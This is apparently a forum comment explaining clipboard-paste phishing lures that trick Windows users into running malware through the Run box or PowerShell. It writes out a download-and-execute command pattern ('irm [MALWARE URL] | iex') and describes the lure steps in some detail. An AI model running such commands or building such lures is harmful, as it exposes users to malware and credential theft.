You can get a virus in a near identical fashion with less steps in Windows 11 like this:
- Go to a phishing website imitating Github.
- Follow the nice provided instructions on how to open PowerShell as admin.
- Copy, paste, and execute the
irm [MALWARE URL] | iex command.
In fact, just searching the Internet, it seems that people have fallen for it:

I mean, the main actual 'security' that OS X has over Windows or (most) Linux systems is that there isn't a convenient way to trick a dumb user into opening a 'run' dialog box that they can then paste something into from the web. Because Spotlight doesn't allow passing in command line options to a command.
This is the best part of targeting Windows users (or, if you're masochistic and don't love money as much, linux users).
You can just show a malicious message telling a user that they need to click somewhere, that then copies a nice malicious string of text to the clipboard, then once they've done that, shows them instructions on how to open the 'run' box (which could be anything from just "hold the

key and tap'r'" through to showing a video of someone doing it on a keyboard), and then how to paste the text in ("hold ctrl and hit v") and hit enter.
Sure, when you're doing that on Windows, a Powershell window will pop up with some computer stuff happening and once the dropper script has downloaded the user might be prompted to approve running commands as administrator, if it's trying to get root immediately (rather than running an infostealer to steal crypto keys and the like from the user's account).
BUT, that's just computer stuff happening in the background to the luser. They just pressed some keys in a friendly GUI. They never have to open a terminal and see the confusing real computer stuff and think 'should I actually be doing this'?
